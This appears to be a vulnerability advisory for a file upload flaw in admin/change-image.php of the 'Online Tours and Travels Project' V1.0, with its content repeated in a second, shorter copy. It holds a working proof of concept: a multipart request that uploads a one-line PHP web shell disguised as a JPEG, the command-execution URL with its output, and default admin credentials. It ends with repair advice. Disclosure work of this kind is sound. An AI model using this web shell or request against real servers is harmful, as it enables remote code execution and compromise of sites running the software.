projectworlds Online Tours and Travels Project V1.0 admin/change-image.php File upload vulnerability
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
- File upload vulnerability
Root Cause
- A file upload vulnerability was identified within the "admin/change-image.php" file of the "Online Tours and Travels Project" project. The root cause lies in the fact that attackers can upload malicious files via the parameter "submit". This input is not properly validated or restricted in terms of file type, size, or content. As a result, attackers are able to upload arbitrary files, including web shells, which may lead to remote code execution.
Impact
- Exploiting this file upload vulnerability allows attackers to upload and execute malicious files on the server, potentially leading to complete system compromise, data theft, service disruption, and unauthorized access. This poses a severe threat to both the security of the system and the continuity of business operations.
DESCRIPTION
- During the security assessment of "Online Tours and Travels Project", I detected a critical file upload vulnerability in the "admin/change-image.php" file. This vulnerability is attributed to the insufficient validation of user-supplied files for the "submit" parameter. This inadequacy enables attackers to upload malicious files without proper restrictions. Consequently, attackers can achieve remote code execution, modify or delete files, and gain control over the system. Immediate corrective actions are essential to safeguard system security and uphold data integrity.
Obtain a valid authentication session by logging in with administrator credentials (Username: admin, Password: admin).
Vulnerability details and POC
Vulnerability location:
Payload:
http://192.168.0.164/Tours-and-travels-in-php-master/admin/pacakgeimages/config.php?cmd=whoami
win-2vie4jropin\edy
Vulnerability Request Packet
POST /Tours-and-travels-in-php-master/admin/change-image.php HTTP/1.1
Host: 192.168.0.164
Content-Length: 321
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.164
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxCP0yqnZzT80bUFh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.164/Tours-and-travels-in-php-master/admin/change-image.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=98r2omt2mmk0e8sgi6hf418q93
Connection: keep-alive
------WebKitFormBoundaryxCP0yqnZzT80bUFh
Content-Disposition: form-data; name="packageimage"; filename="config.php"
Content-Type: image/jpeg
<?php system($_GET['cmd']); ?>
------WebKitFormBoundaryxCP0yqnZzT80bUFh
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundaryxCP0yqnZzT80bUFh--
The following are screenshots of some specific information obtained from testing and running :
Suggested repair
-
Implement strict file type validation:
Restrict allowed file types to a whitelist of safe extensions and MIME types. Do not rely solely on client-side validation.
-
Validate file content:
Check the actual content of the uploaded file to ensure it matches the expected type. Use server-side checks to prevent file type spoofing.
-
Rename uploaded files:
Generate a random filename for each uploaded file to prevent direct access and path traversal attacks.
-
Store files outside the web root:
If possible, store uploaded files in a directory that is not directly accessible via the web. Serve them through a secure script that controls access.
-
Limit file size:
Implement maximum file size limits to prevent denial-of-service attacks via large uploads.
-
Use secure permissions:
Ensure that uploaded files have minimal permissions and cannot be executed as code unless explicitly intended.
projectworlds Online Tours and Travels Project V1.0 admin/change-image.php File upload vulnerability
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
Obtain a valid authentication session by logging in with administrator credentials (Username: admin, Password: admin).
Vulnerability details and POC
Vulnerability location:
Payload:
http://192.168.0.164/Tours-and-travels-in-php-master/admin/pacakgeimages/config.php?cmd=whoami win-2vie4jropin\edyVulnerability Request Packet
The following are screenshots of some specific information obtained from testing and running :
Suggested repair
Implement strict file type validation:
Restrict allowed file types to a whitelist of safe extensions and MIME types. Do not rely solely on client-side validation.
Validate file content:
Check the actual content of the uploaded file to ensure it matches the expected type. Use server-side checks to prevent file type spoofing.
Rename uploaded files:
Generate a random filename for each uploaded file to prevent direct access and path traversal attacks.
Store files outside the web root:
If possible, store uploaded files in a directory that is not directly accessible via the web. Serve them through a secure script that controls access.
Limit file size:
Implement maximum file size limits to prevent denial-of-service attacks via large uploads.
Use secure permissions:
Ensure that uploaded files have minimal permissions and cannot be executed as code unless explicitly intended.